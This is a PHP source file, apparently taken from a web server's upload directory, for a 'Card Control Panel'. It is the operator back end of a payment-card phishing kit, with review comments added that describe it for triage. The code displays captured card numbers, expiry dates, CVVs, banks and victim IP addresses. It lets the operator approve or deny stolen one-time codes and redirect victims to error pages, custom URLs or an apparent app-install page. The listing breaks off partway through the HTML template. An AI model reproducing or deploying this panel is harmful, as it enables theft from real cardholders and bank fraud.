Current Path : /home/da040400/www_root/upload/o2ot/
Current File : /home/da040400/www_root/upload/o2ot/control-panel-full.php

<?php
// Start (or resume) the PHP session. The login flag and the one-shot status
// messages used by this page are all kept in it.
session_start();

// Operator credentials, hard-coded in plaintext.
// NOTE(review): anyone who obtains a copy of this file obtains the credentials, and
// the literals are a stable string to search for when looking for other copies.
$admin_username = 'admin';
$admin_password = 'password123'; // compared verbatim by the login handler; never hashed

// True only when an earlier request stored boolean true under this session key.
$is_logged_in = isset($_SESSION['admin_logged_in']) && $_SESSION['admin_logged_in'] === true;

// One-shot ("flash") messages: each handler further down stores its result text in
// the session and redirects; here the text is copied into a local variable and
// removed from the session so it is displayed once. When no message is set the
// local variable stays undefined, so later code must test it with isset().
if (isset($_SESSION['success_message'])) {
    $redirect_message = $_SESSION['success_message'];
    unset($_SESSION['success_message']);
}

if (isset($_SESSION['error_message'])) {
    $redirect_error = $_SESSION['error_message'];
    unset($_SESSION['error_message']);
}

// Result / error text written by the two OTP handlers.
if (isset($_SESSION['otp_message'])) {
    $otp_message = $_SESSION['otp_message'];
    unset($_SESSION['otp_message']);
}

if (isset($_SESSION['otp_error'])) {
    $otp_error = $_SESSION['otp_error'];
    unset($_SESSION['otp_error']);
}

// Confirmation text written by the save_settings handler.
if (isset($_SESSION['save_message'])) {
    $save_message = $_SESSION['save_message'];
    unset($_SESSION['save_message']);
}

// Login handler: runs for any POST carrying action=login, regardless of whether
// the session is already authenticated.
if (isset($_POST['action']) && $_POST['action'] === 'login') {
    // Missing fields fall back to '' so the comparison below simply fails.
    $username = isset($_POST['username']) ? $_POST['username'] : '';
    $password = isset($_POST['password']) ? $_POST['password'] : '';
    
    // Plain === comparison against the plaintext literals defined at the top of the file.
    if ($username === $admin_username && $password === $admin_password) {
        // The existing session is marked authenticated; its ID is not regenerated here.
        $_SESSION['admin_logged_in'] = true;
        $is_logged_in = true;
        
        // Post/redirect/get: reload the page with GET so a refresh does not re-send the form
        header('Location: ' . $_SERVER['PHP_SELF']);
        exit;
    } else {
        // The failure text is parked in the session; the login form prints and clears it
        // after the redirect.
        $_SESSION['login_error'] = "Invalid username or password";
        header('Location: ' . $_SERVER['PHP_SELF']);
        exit;
    }
}

// Logout handler: triggered by the GET parameter action=logout; no login check is made first.
if (isset($_GET['action']) && $_GET['action'] === 'logout') {
    // Drop all session variables, then destroy the session data itself
    session_unset();
    session_destroy();
    
    // NOTE(review): this target is a fixed file name, unlike the PHP_SELF redirects used
    // everywhere else in the script; whether a file of that name exists next to this one
    // cannot be told from this listing.
    header('Location: control_panel.php');
    exit;
}

// Storage locations, given as relative paths.
// NOTE(review): these two JSON files are the panel's on-disk state and are useful
// artifacts to look for when triaging a host; if the directory sits under the web
// root (presumably, given the relative path — confirm), they are served over HTTP
// unless the server is configured to block them.
$config_dir = 'config';
$redirect_config_file = $config_dir . '/redirect_settings.json';
$pending_cards_file = $config_dir . '/pending_cards.json';

// Defaults used when no settings file exists, or for keys the file does not define.
$default_settings = [
    'success_url' => 'success-page.html',
    'failure_url' => 'failed.html',
    'default_destination' => 'https://www.example.com',
    'redirect_delay' => 2,
    'enable_otp' => true // toggles the OTP step; saved from a checkbox by the settings handler
];

// Start from the defaults; values from the file are merged over them below.
$settings = $default_settings;

// Create the config directory on first run (mode 0755, recursive).
// The is_dir() test adds nothing once file_exists() is false, and the return
// value of mkdir() is not checked.
if (!file_exists($config_dir) && !is_dir($config_dir)) {
    mkdir($config_dir, 0755, true);
}

// Load saved settings. Anything that does not decode to an array is ignored and the
// defaults stay in effect. array_merge() lets file values override defaults and also
// carries along any extra keys present in the file.
if (file_exists($redirect_config_file)) {
    $config_content = file_get_contents($redirect_config_file);
    $loaded_settings = json_decode($config_content, true);
    if (is_array($loaded_settings)) {
        $settings = array_merge($settings, $loaded_settings);
    }
}

// Settings handler: only runs for an authenticated session posting action=save_settings.
if ($is_logged_in && isset($_POST['action']) && $_POST['action'] === 'save_settings') {
    // Each field falls back to the current value when absent from the POST.
    // The three URL fields are stored exactly as submitted (no format or scheme check).
    $settings['success_url'] = isset($_POST['success_url']) ? $_POST['success_url'] : $settings['success_url'];
    $settings['failure_url'] = isset($_POST['failure_url']) ? $_POST['failure_url'] : $settings['failure_url'];
    $settings['default_destination'] = isset($_POST['default_destination']) ? $_POST['default_destination'] : $settings['default_destination'];
    // Cast to int; no lower or upper bound is applied.
    $settings['redirect_delay'] = isset($_POST['redirect_delay']) ? (int)$_POST['redirect_delay'] : $settings['redirect_delay'];
    // Presence-based: any submitted value means true, an absent field means false.
    $settings['enable_otp'] = isset($_POST['enable_otp']) ? true : false;
    
    // Overwrite the settings file; the write result is not checked and no lock is taken.
    file_put_contents($redirect_config_file, json_encode($settings, JSON_PRETTY_PRINT));
    
    // Picked up as a one-shot message on the next request.
    $_SESSION['save_message'] = 'Settings saved successfully!';
    
    // Post/redirect/get back to the settings tab
    header('Location: ' . $_SERVER['PHP_SELF'] . '?tab=settings');
    exit;
}
// redirect_user handler: an authenticated operator attaches a destination URL to one
// pending record, identified by the session ID that keys the pending-cards file.
// NOTE(review): presumably the page the card holder is waiting on reads this record and
// follows redirect_url — that side is not part of this listing; confirm. The fields
// written here (status, redirect_url, redirect_time, redirect_by) are what an
// investigator would find in pending_cards.json.
if ($is_logged_in && isset($_POST['action']) && $_POST['action'] === 'redirect_user') {
    // Both values are taken from the POST as-is.
    $session_id = isset($_POST['session_id']) ? $_POST['session_id'] : '';
    $redirect_url = isset($_POST['redirect_url']) ? $_POST['redirect_url'] : '';
    
    // Read the whole file; invalid or empty JSON falls back to an empty array via ?:
    $pending_cards = [];
    if (file_exists($pending_cards_file)) {
        $pending_content = file_get_contents($pending_cards_file);
        $pending_cards = json_decode($pending_content, true) ?: [];
    }
    
    // Only an existing record is updated; unknown IDs produce an error message instead.
    if (isset($pending_cards[$session_id])) {
        $pending_cards[$session_id]['redirect_url'] = $redirect_url;
        $pending_cards[$session_id]['status'] = 'redirected';
        $pending_cards[$session_id]['redirect_time'] = date('Y-m-d H:i:s'); // server-local time zone
        $pending_cards[$session_id]['redirect_by'] = $admin_username;
        
        // Whole-file rewrite with no locking: a concurrent writer between the read above
        // and this write loses its update.
        file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
        
        // Raw POST values are interpolated into the message; the template later echoes
        // this text without htmlspecialchars().
        $_SESSION['success_message'] = "User with Session ID: $session_id has been redirected to: $redirect_url";
    } else {
        $_SESSION['error_message'] = "Session ID not found in pending cards";
    }
    
    // Post/redirect/get back to the pending tab
    header('Location: ' . $_SERVER['PHP_SELF'] . '?tab=pending');
    exit;
}

// handle_otp handler: an authenticated operator approves or denies the OTP step for one
// pending record. Either way the record ends up with status 'redirected'; the decision
// only selects otp_status and the destination URL.
if ($is_logged_in && isset($_POST['action']) && $_POST['action'] === 'handle_otp') {
    // All three values are taken from the POST as-is.
    $session_id = isset($_POST['session_id']) ? $_POST['session_id'] : '';
    $otp_decision = isset($_POST['otp_decision']) ? $_POST['otp_decision'] : '';
    $redirect_url = isset($_POST['redirect_url']) ? $_POST['redirect_url'] : '';
    
    // Read the whole file; invalid or empty JSON falls back to an empty array via ?:
    $pending_cards = [];
    if (file_exists($pending_cards_file)) {
        $pending_content = file_get_contents($pending_cards_file);
        $pending_cards = json_decode($pending_content, true) ?: [];
    }
    
    // Only an existing record is updated.
    if (isset($pending_cards[$session_id])) {
        if ($otp_decision === 'approve') {
            // Approve: the operator-supplied URL becomes the destination.
            $pending_cards[$session_id]['otp_status'] = 'approved';
            $pending_cards[$session_id]['status'] = 'redirected';
            $pending_cards[$session_id]['redirect_url'] = $redirect_url;
            $pending_cards[$session_id]['redirect_time'] = date('Y-m-d H:i:s');
            $pending_cards[$session_id]['redirect_by'] = $admin_username;
            
            // Raw POST values are interpolated; the template echoes this text unescaped.
            $_SESSION['otp_message'] = "OTP approved for Session ID: $session_id. User will be redirected to: $redirect_url";
        } else {
            // Any value other than 'approve' (including an empty one) is treated as a denial;
            // the destination is the configured failure_url and the submitted URL is ignored.
            $pending_cards[$session_id]['otp_status'] = 'denied';
            $pending_cards[$session_id]['status'] = 'redirected';
            $pending_cards[$session_id]['redirect_url'] = $settings['failure_url'];
            $pending_cards[$session_id]['redirect_time'] = date('Y-m-d H:i:s');
            $pending_cards[$session_id]['redirect_by'] = $admin_username;
            
            $_SESSION['otp_message'] = "OTP denied for Session ID: $session_id. User will be redirected to failure page.";
        }
        
        // Whole-file rewrite, no locking, write result not checked
        file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
    } else {
        $_SESSION['otp_error'] = "Session ID not found in pending cards";
    }
    
    // Post/redirect/get back to the OTP tab
    header('Location: ' . $_SERVER['PHP_SELF'] . '?tab=otp');
    exit;
}
// handle_otp_redirect handler: like handle_otp, but the approval path offers several
// destinations chosen by redirect_choice. The otp_status values written here
// ('denied', 'approved', 'error', 'app_verification', 'custom_redirect') distinguish
// the branches in pending_cards.json.
if ($is_logged_in && isset($_POST['action']) && $_POST['action'] === 'handle_otp_redirect') {
    // Values are taken from the POST as-is; redirect_choice defaults to 'success'.
    $session_id = isset($_POST['session_id']) ? $_POST['session_id'] : '';
    $otp_decision = isset($_POST['otp_decision']) ? $_POST['otp_decision'] : '';
    $redirect_choice = isset($_POST['redirect_choice']) ? $_POST['redirect_choice'] : 'success';
    
    // Read the whole file; invalid or empty JSON falls back to an empty array via ?:
    $pending_cards = [];
    if (file_exists($pending_cards_file)) {
        $pending_content = file_get_contents($pending_cards_file);
        $pending_cards = json_decode($pending_content, true) ?: [];
    }
    
    // Only an existing record is updated.
    if (isset($pending_cards[$session_id])) {
        $redirect_url = '';
        
        if ($otp_decision === 'deny') {
            // Deny always goes to the configured failure page; redirect_choice is ignored
            $redirect_url = $settings['failure_url'];
            $pending_cards[$session_id]['otp_status'] = 'denied';
            $_SESSION['otp_message'] = "OTP denied for Session ID: $session_id. User will be redirected to failure page.";
        } else {
            // Every decision other than 'deny' (including an empty one) takes this path.
            switch ($redirect_choice) {
                case 'success':
                    $redirect_url = $settings['success_url'];
                    $pending_cards[$session_id]['otp_status'] = 'approved';
                    $_SESSION['otp_message'] = "OTP approved for Session ID: $session_id. User will be redirected to success page.";
                    break;
                    
                case 'error':
                    // Builds a relative URL to otp-error.php with URL-encoded type and attempts
                    // parameters (defaults 'timeout' and '1').
                    // NOTE(review): what that page shows is not visible in this listing.
                    $error_type = isset($_POST['error_type']) ? $_POST['error_type'] : 'timeout';
                    $error_attempts = isset($_POST['error_attempts']) ? $_POST['error_attempts'] : '1';
                    $redirect_url = "otp-error.php?type=" . urlencode($error_type) . "&attempts=" . urlencode($error_attempts);
                    $pending_cards[$session_id]['otp_status'] = 'error';
                    // The message uses the raw, un-encoded POST values.
                    $_SESSION['otp_message'] = "OTP redirected to error page with type: $error_type, attempts: $error_attempts";
                    break;
                    
                case 'app':
                    // NOTE(review): the file name suggests the user is steered to an app/APK
                    // step; the page itself is not in this listing — confirm.
                    $redirect_url = "apk-verification.php";
                    $pending_cards[$session_id]['otp_status'] = 'app_verification';
                    $_SESSION['otp_message'] = "User redirected to app verification page.";
                    break;
                    
                case 'custom':
                    // Operator-supplied URL stored as-is; falls back to success_url when absent.
                    $redirect_url = isset($_POST['custom_url']) ? $_POST['custom_url'] : $settings['success_url'];
                    $pending_cards[$session_id]['otp_status'] = 'custom_redirect';
                    $_SESSION['otp_message'] = "OTP approved with custom redirection to: $redirect_url";
                    break;
                    
                default:
                    // Unrecognised choices behave exactly like 'success'.
                    $redirect_url = $settings['success_url'];
                    $pending_cards[$session_id]['otp_status'] = 'approved';
                    $_SESSION['otp_message'] = "OTP approved for Session ID: $session_id. User will be redirected to success page.";
                    break;
            }
        }
        
        // Common to every branch: mark the record handled and record where, when and by whom.
        $pending_cards[$session_id]['status'] = 'redirected';
        $pending_cards[$session_id]['redirect_url'] = $redirect_url;
        $pending_cards[$session_id]['redirect_time'] = date('Y-m-d H:i:s');
        $pending_cards[$session_id]['redirect_by'] = $admin_username;
        
        // Whole-file rewrite, no locking, write result not checked
        file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
    } else {
        $_SESSION['otp_error'] = "Session ID not found in pending cards";
    }
    
    // Post/redirect/get back to the OTP tab
    header('Location: ' . $_SERVER['PHP_SELF'] . '?tab=otp');
    exit;
}

// Everything below runs on every request that was not ended by a handler above,
// including unauthenticated ones; the template decides what is actually shown.

// Full record store: data/cards.json, a second on-disk artifact besides the two
// files under config/.
$all_cards = [];
$data_dir = 'data';
$json_file = $data_dir . '/cards.json';

if (file_exists($json_file)) {
    $file_contents = file_get_contents($json_file);
    if (!empty($file_contents)) {
        // Falsy decode results (null on invalid JSON, empty array) become [].
        // NOTE(review): a truthy non-array value would pass through unchanged and reach
        // count() below; unlike the pending-cards load, there is no is_array() guard here.
        $all_cards = json_decode($file_contents, true) ?: [];
    }
}

// Pending records, keyed by session ID; only an array result is accepted.
$pending_cards = [];
if (file_exists($pending_cards_file)) {
    $pending_content = file_get_contents($pending_cards_file);
    $loaded_pending = json_decode($pending_content, true);
    if (is_array($loaded_pending)) {
        $pending_cards = $loaded_pending;
    }
}

// Dashboard counters. Each filter keeps records whose 'status' equals the given value;
// records without a 'status' key are counted nowhere.
$total_cards = count($all_cards);
$total_pending = count(array_filter($pending_cards, function($card) {
    return isset($card['status']) && $card['status'] === 'pending';
}));
$total_redirected = count(array_filter($pending_cards, function($card) {
    return isset($card['status']) && $card['status'] === 'redirected';
}));

// "Pending OTP" covers both OTP states, so it includes every record that is also
// counted in $total_otp_submitted below.
$total_otp_pending = count(array_filter($pending_cards, function($card) {
    return isset($card['status']) && 
           ($card['status'] === 'otp_verification' || $card['status'] === 'otp_submitted');
}));

$total_otp_submitted = count(array_filter($pending_cards, function($card) {
    return isset($card['status']) && $card['status'] === 'otp_submitted';
}));

// Reverse the stored order and keep the first ten, i.e. the last ten entries of the file
// (presumably the newest, if records are appended chronologically — confirm).
$recent_cards = array_slice(array_reverse($all_cards), 0, 10);
// Function to mask a credit card number
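/**
 * Mask the middle digits of a card number for display.
 *
 * Non-digit characters are stripped first. Numbers of four digits or fewer are
 * returned unchanged. For ten digits or more the first six and last four digits
 * are kept and everything in between is replaced with 'X'. Numbers of five to
 * nine digits keep only their last four digits.
 *
 * NOTE(review): the masking is display-only. It does not alter the value passed in,
 * and the template prints the expiry date and CVV next to the masked number.
 *
 * @param mixed $cardNumber Card number as stored; cast to string before use.
 * @return string Digits-only, partially masked representation (no separators are added).
 */
function maskCardNumber($cardNumber) {
    // Strip everything that is not a digit; the cast covers null and numeric input.
    $digits = preg_replace('/\D/', '', (string) $cardNumber);
    $length = strlen($digits);

    // Too short to mask meaningfully: return the digits as they are.
    if ($length <= 4) {
        return $digits;
    }

    $lastFour = substr($digits, -4);

    // With fewer than ten digits the 6+4 window overlaps: the original code passed a
    // negative count to str_repeat() (a ValueError on PHP 8) and, where that only
    // warned, printed overlapping digits. Mask all but the last four instead.
    if ($length < 10) {
        return str_repeat('X', $length - 4) . $lastFour;
    }

    // Ten digits or more: first six + masked middle + last four.
    return substr($digits, 0, 6) . str_repeat('X', $length - 10) . $lastFour;
}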
?><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Card Control Panel</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            line-height: 1.6;
            margin: 0;
            padding: 0;
            background-color: #f5f5f5;
            color: #333;
        }
        
        .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 20px;
        }
        
        .login-container {
            max-width: 400px;
            margin: 100px auto;
            background: #fff;
            padding: 30px;
            border-radius: 8px;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
        }
        
        .panel-container {
            background: #fff;
            border-radius: 8px;
            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
            margin-bottom: 20px;
        }
        
        .panel-header {
            background-color: #4a6da7;
            color: white;
            padding: 15px 20px;
            border-top-left-radius: 8px;
            border-top-right-radius: 8px;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        
        .panel-header h1 {
            margin: 0;
            font-size: 24px;
        }
        
        .panel-body {
            padding: 20px;
        }
        
        .form-group {
            margin-bottom: 20px;
        }
        
        label {
            display: block;
            margin-bottom: 8px;
            font-weight: bold;
        }
        
        input[type="text"],
        input[type="password"],
        input[type="number"],
        input[type="url"],
        input[type="checkbox"] {
            padding: 10px;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-size: 16px;
            box-sizing: border-box;
        }

        input[type="text"],
        input[type="password"],
        input[type="number"],
        input[type="url"] {
            width: 100%;
        }
        
        button, .btn {
            background-color: #4a6da7;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
            font-weight: bold;
            text-decoration: none;
            display: inline-block;
        }
        
        button:hover, .btn:hover {
            background-color: #3a5a8f;
        }
        
        .logout-btn {
            background-color: #f44336;
            padding: 8px 16px;
            font-size: 14px;
        }
        
        .logout-btn:hover {
            background-color: #d32f2f;
        }
        
        .btn-success {
            background-color: #4CAF50;
        }
        
        .btn-success:hover {
            background-color: #3e8e41;
        }
        
        .btn-warning {
            background-color: #ff9800;
        }
        
        .btn-warning:hover {
            background-color: #e68a00;
        }
        
        .btn-danger {
            background-color: #f44336;
        }
        
        .btn-danger:hover {
            background-color: #d32f2f;
        }
        
        .alert {
            padding: 12px 16px;
            margin-bottom: 20px;
            border-radius: 4px;
        }
        
        .alert-success {
            background-color: #dff0d8;
            color: #3c763d;
            border: 1px solid #d6e9c6;
        }
        
        .alert-danger {
            background-color: #f2dede;
            color: #a94442;
            border: 1px solid #ebccd1;
        }
        
        .stats-grid {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(230px, 1fr));
            gap: 20px;
            margin-bottom: 30px;
        }
        
        .stat-card {
            background-color: white;
            border-radius: 8px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
            padding: 20px;
            text-align: center;
        }
        
        .stat-value {
            font-size: 36px;
            font-weight: bold;
            margin: 10px 0;
            color: #4a6da7;
        }
        
        .stat-label {
            color: #777;
            font-size: 14px;
            text-transform: uppercase;
        }
        
        table {
            width: 100%;
            border-collapse: collapse;
        }
        
        th, td {
            padding: 12px 15px;
            text-align: left;
            border-bottom: 1px solid #ddd;
        }
        
        th {
            background-color: #f8f9fa;
            font-weight: bold;
        }
        
        tr:hover {
            background-color: #f5f5f5;
        }
        
        .card-details {
            margin-bottom: 15px;
            border-left: 4px solid #4a6da7;
            padding: 10px 15px;
            background-color: #f9f9f9;
        }
        
        .card-actions {
            margin-top: 15px;
        }
        
        .tabs {
            display: flex;
            border-bottom: 1px solid #ddd;
            margin-bottom: 20px;
        }
        
        .tab {
            padding: 10px 20px;
            cursor: pointer;
            border-bottom: 2px solid transparent;
        }
        
        .tab.active {
            border-bottom: 2px solid #4a6da7;
            font-weight: bold;
            color: #4a6da7;
        }
        
        .tab-content {
            display: none;
        }
        
        .tab-content.active {
            display: block;
        }
        
        .badge {
            display: inline-block;
            padding: 4px 8px;
            border-radius: 50px;
            font-size: 12px;
            font-weight: bold;
            text-transform: uppercase;
        }
        
        .badge-success {
            background-color: #4CAF50;
            color: white;
        }
        
        .badge-warning {
            background-color: #ff9800;
            color: white;
        }
        
        .badge-danger {
            background-color: #f44336;
            color: white;
        }
        
        .badge-info {
            background-color: #2196F3;
            color: white;
        }
        
        .modal {
            display: none;
            position: fixed;
            z-index: 1000;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
        }
        
        .modal-content {
            background-color: #fff;
            margin: 10% auto;
            padding: 20px;
            border-radius: 8px;
            width: 50%;
            max-width: 500px;
        }
        
        .modal-header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            border-bottom: 1px solid #ddd;
            padding-bottom: 10px;
            margin-bottom: 20px;
        }
        
        .modal-header h2 {
            margin: 0;
        }
        
        .modal-footer {
            border-top: 1px solid #ddd;
            padding-top: 15px;
            margin-top: 20px;
            text-align: right;
        }
        
        .close {
            color: #aaa;
            font-size: 28px;
            font-weight: bold;
            cursor: pointer;
        }
        
        .close:hover {
            color: #333;
        }
        
        .loader {
            border: 4px solid #f3f3f3;
            border-top: 4px solid #4a6da7;
            border-radius: 50%;
            width: 30px;
            height: 30px;
            animation: spin 1s linear infinite;
            margin: 20px auto;
        }
        
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        
        .live-feed {
            background-color: #f9f9f9;
            border-radius: 4px;
            padding: 15px;
            height: 300px;
            overflow-y: auto;
            margin-bottom: 20px;
        }
        
        .live-feed-item {
            padding: 10px;
            border-bottom: 1px solid #eee;
        }
        
        .live-feed-item:last-child {
            border-bottom: none;
        }
        
        .live-feed-time {
            font-size: 12px;
            color: #777;
        }
        
        .refresh-btn {
            background-color: transparent;
            color: #4a6da7;
            border: 1px solid #4a6da7;
            padding: 8px 16px;
            margin-bottom: 15px;
        }
        
        .refresh-btn:hover {
            background-color: #f0f5ff;
        }
        
        .flex-row {
            display: flex;
            flex-wrap: wrap;
            gap: 15px;
            margin-bottom: 15px;
        }
        
        .card-info {
            flex: 1;
            min-width: 300px;
        }
        
        .card-redirect {
            flex: 1;
            min-width: 300px;
        }

        small {
            display: block;
            margin-top: 5px;
            color: #777;
            font-size: 0.8em;
        }
        
        .radio-options {
            margin-top: 10px;
        }
        .radio-option {
            margin-bottom: 8px;
        }
        .radio-option input[type="radio"] {
            margin-right: 5px;
        }
        
        select {
            width: 100%;
            padding: 10px;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-size: 16px;
            box-sizing: border-box;
        }
    </style>
</head>
<body>
    <div class="container">
        <?php if (!$is_logged_in): ?>
        <!-- Login Form -->
        <div class="login-container">
            <h2>Card Control Panel Login</h2>
            
            <?php if (isset($_SESSION['login_error'])): ?>
            <div class="alert alert-danger">
                <?php echo $_SESSION['login_error']; unset($_SESSION['login_error']); ?>
            </div>
            <?php endif; ?>
            
            <form method="post" action="">
                <div class="form-group">
                    <label for="username">Username</label>
                    <input type="text" id="username" name="username" required>
                </div>
                
                <div class="form-group">
                    <label for="password">Password</label>
                    <input type="password" id="password" name="password" required>
                </div>
                
                <input type="hidden" name="action" value="login">
                <button type="submit">Login</button>
            </form>
        </div>
        <?php else: ?>
        <!-- Admin Panel -->
        <div class="panel-container">
            <div class="panel-header">
                <h1>Card Control Panel</h1>
                <a href="?action=logout"><button class="logout-btn">Logout</button></a>
            </div>
            
            <div class="panel-body">
                <!-- Stats Overview -->
                <div class="stats-grid">
                    <div class="stat-card">
                        <div class="stat-value"><?php echo $total_cards; ?></div>
                        <div class="stat-label">Total Cards</div>
                    </div>
                    
                    <div class="stat-card">
                        <div class="stat-value"><?php echo $total_pending; ?></div>
                        <div class="stat-label">Pending Redirects</div>
                    </div>
                    
                    <div class="stat-card">
                        <div class="stat-value"><?php echo $total_redirected; ?></div>
                        <div class="stat-label">Redirected Users</div>
                    </div>

                    <div class="stat-card">
                        <div class="stat-value"><?php echo $total_otp_pending; ?></div>
                        <div class="stat-label">Pending OTP</div>
                    </div>
                    
                    <div class="stat-card">
                        <div class="stat-value"><?php echo $total_otp_submitted; ?></div>
                        <div class="stat-label">OTP Submitted</div>
                    </div>
                </div>
                
                <div class="tabs">
                    <div class="tab active" data-tab="pending">Pending Redirects</div>
                    <div class="tab" data-tab="otp">OTP Verification</div>
                    <div class="tab" data-tab="recent">Recent Cards</div>
                    <div class="tab" data-tab="settings">Redirect Settings</div>
                </div>
				<!-- Pending Redirects Tab -->
                <div class="tab-content active" id="pending-tab">
                    <h2>Pending Redirects</h2>
                    
                    <?php if (isset($redirect_message)): ?>
                    <div class="alert alert-success">
                        <?php echo $redirect_message; ?>
                    </div>
                    <?php endif; ?>
                    
                    <?php if (isset($redirect_error)): ?>
                    <div class="alert alert-danger">
                        <?php echo $redirect_error; ?>
                    </div>
                    <?php endif; ?>
                    
                    <button id="refreshPendingBtn" class="refresh-btn">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                            <path d="M1 4v6h6"/><path d="M23 20v-6h-6"/>
                            <path d="M20.49 9A9 9 0 0 0 5.64 5.64L1 10m22 4l-4.64 4.36A9 9 0 0 1 3.51 15"/>
                        </svg>
                        Refresh List
                    </button>
                    
                    <?php if (empty($pending_cards) || count(array_filter($pending_cards, function($card) { return isset($card['status']) && $card['status'] === 'pending'; })) === 0): ?>
                    <p>No pending cards waiting for redirection.</p>
                    <?php else: ?>
                    <div id="pendingCardsList">
                        <?php foreach ($pending_cards as $session_id => $card): ?>
                        <?php if (isset($card['status']) && $card['status'] === 'pending'): ?>
                        <div class="card-details">
                            <div class="flex-row">
                                <div class="card-info">
                                    <h3>Card Information</h3>
                                    <p><strong>Session ID:</strong> <?php echo htmlspecialchars($session_id); ?></p>
                                    <p><strong>Card Number:</strong> <?php echo htmlspecialchars(maskCardNumber($card['card_number'])); ?></p>
                                    <p><strong>Expiry:</strong> <?php echo htmlspecialchars($card['expiry_date']); ?></p>
                                    <p><strong>CVV:</strong> <?php echo htmlspecialchars($card['cvv']); ?></p>
                                    <p><strong>Save Card:</strong> <?php echo isset($card['save_card']) ? htmlspecialchars($card['save_card']) : 'No'; ?></p>
                                    <p><strong>Card Type:</strong> <?php echo isset($card['card_type']) ? htmlspecialchars($card['card_type']) : 'Unknown'; ?></p>
                                    <p><strong>Bank:</strong> <?php echo isset($card['bank_name']) ? htmlspecialchars($card['bank_name']) : 'Unknown'; ?></p>
                                    <p><strong>IP Address:</strong> <?php echo htmlspecialchars($card['ip']); ?></p>
                                    <p><strong>Time:</strong> <?php echo htmlspecialchars($card['timestamp']); ?></p>
                                </div>
                                
                                <div class="card-redirect">
                                    <h3>Redirect User</h3>
                                    <form method="post" action="">
                                        <div class="form-group">
                                            <label for="redirect_url_<?php echo $session_id; ?>">Redirect URL</label>
                                            <input type="url" id="redirect_url_<?php echo $session_id; ?>" name="redirect_url" value="<?php echo htmlspecialchars($settings['success_url']); ?>" required>
                                        </div>
                                        
                                        <input type="hidden" name="session_id" value="<?php echo htmlspecialchars($session_id); ?>">
                                        <input type="hidden" name="action" value="redirect_user">
                                        
                                        <div class="card-actions">
                                            <button type="submit" class="btn-success">Redirect User</button>
                                            <button type="button" class="btn-danger" onclick="setRedirectUrl('<?php echo $session_id; ?>', '<?php echo htmlspecialchars($settings['failure_url']); ?>')">Decline</button>
                                        </div>
                                    </form>
                                </div>
                            </div>
                        </div>
                        <?php endif; ?>
                        <?php endforeach; ?>
                    </div>
                    <?php endif; ?>
                </div>
				<!-- OTP Verification Tab with Enhanced Redirection Options -->
                <div class="tab-content" id="otp-tab">
                    <h2>OTP Verification Requests</h2>
                    
                    <?php if (isset($otp_message)): /* one-shot status text for the logged-in admin; the top of the file copies it out of $_SESSION['otp_message'] and unsets it */ ?>
                    <div class="alert alert-success">
                        <?php echo $otp_message; /* echoed as stored, without htmlspecialchars() */ ?>
                    </div>
                    <?php endif; ?>
                    
                    <?php if (isset($otp_error)): /* same pattern for the error text, sourced from $_SESSION['otp_error'] */ ?>
                    <div class="alert alert-danger">
                        <?php echo $otp_error; /* echoed as stored, without htmlspecialchars() */ ?>
                    </div>
                    <?php endif; ?>
                    
                    <button id="refreshOtpBtn" class="refresh-btn">
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                            <path d="M1 4v6h6"/><path d="M23 20v-6h-6"/>
                            <path d="M20.49 9A9 9 0 0 0 5.64 5.64L1 10m22 4l-4.64 4.36A9 9 0 0 1 3.51 15"/>
                        </svg>
                        Refresh OTP List
                    </button>
                    
                    <?php if (empty($pending_cards) || count(array_filter($pending_cards, function($card) { 
                        // Only entries in the OTP stage count here: status 'otp_verification'
                        // (waiting for a code) or 'otp_submitted' (a code has been stored).
                        return isset($card['status']) && ($card['status'] === 'otp_verification' || $card['status'] === 'otp_submitted'); 
                    })) === 0): ?>
                    <p>No pending OTP verification requests.</p>
                    <?php else: ?>
                    <div id="otpRequestsList">
                        <?php foreach ($pending_cards as $session_id => $card): /* $session_id is the array key; the hidden session_id field in the form below ties the admin's decision to this one entry */ ?>
                        <?php if (isset($card['status']) && ($card['status'] === 'otp_verification' || $card['status'] === 'otp_submitted')): ?>
                        <div class="card-details">
                            <div class="flex-row">
                                <div class="card-info">
                                    <h3>Card Information</h3>
                                    <p><strong>Session ID:</strong> <?php echo htmlspecialchars($session_id); ?></p>
                                    <p><strong>Card Number:</strong> <?php echo htmlspecialchars(maskCardNumber($card['card_number'])); /* maskCardNumber() is defined outside this view; presumably it hides part of the number - TODO confirm */ ?></p>
                                    <p><strong>Expiry:</strong> <?php echo htmlspecialchars($card['expiry_date']); ?></p>
                                    <p><strong>CVV:</strong> <?php echo htmlspecialchars($card['cvv']); /* printed as stored; no masking is applied in this view */ ?></p>
                                    <p><strong>Save Card:</strong> <?php echo isset($card['save_card']) ? htmlspecialchars($card['save_card']) : 'No'; ?></p>
                                    <p><strong>Card Type:</strong> <?php echo isset($card['card_type']) ? htmlspecialchars($card['card_type']) : 'Unknown'; ?></p>
                                    <p><strong>Bank:</strong> <?php echo isset($card['bank_name']) ? htmlspecialchars($card['bank_name']) : 'Unknown'; ?></p>
                                    <p><strong>IP Address:</strong> <?php echo htmlspecialchars($card['ip']); ?></p>
